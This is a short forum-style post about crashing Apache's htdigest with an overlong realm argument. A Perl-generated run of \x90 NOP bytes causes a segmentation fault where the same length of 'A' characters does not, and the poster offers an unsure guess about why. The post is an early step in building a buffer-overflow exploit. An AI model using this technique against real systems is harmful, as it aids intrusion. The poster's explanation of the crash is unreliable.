EDIT
definately very wierd
I dont really know what is the problem. What I do know is that when you use \x90 its putting 2 bytes on the stack at the moment that you use \x90 in stead of \x41 you have to have twice more \x41 as when you use \x90
htdigest ./pikah `perl -e 'print "\x90"x163'` user
Adding user ������������������������������������ in realm
�������������������������������������������������� ��������������������������
�������������������������������������������������� ��������������������������
������������
New password:
Re-type new password:
Segmentation fault (core dumped)
htdigest ./pikah `perl -e 'print "\x41"x163'` user
Adding user user in realm
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA
New password:
Re-type new password:
(no core dump) |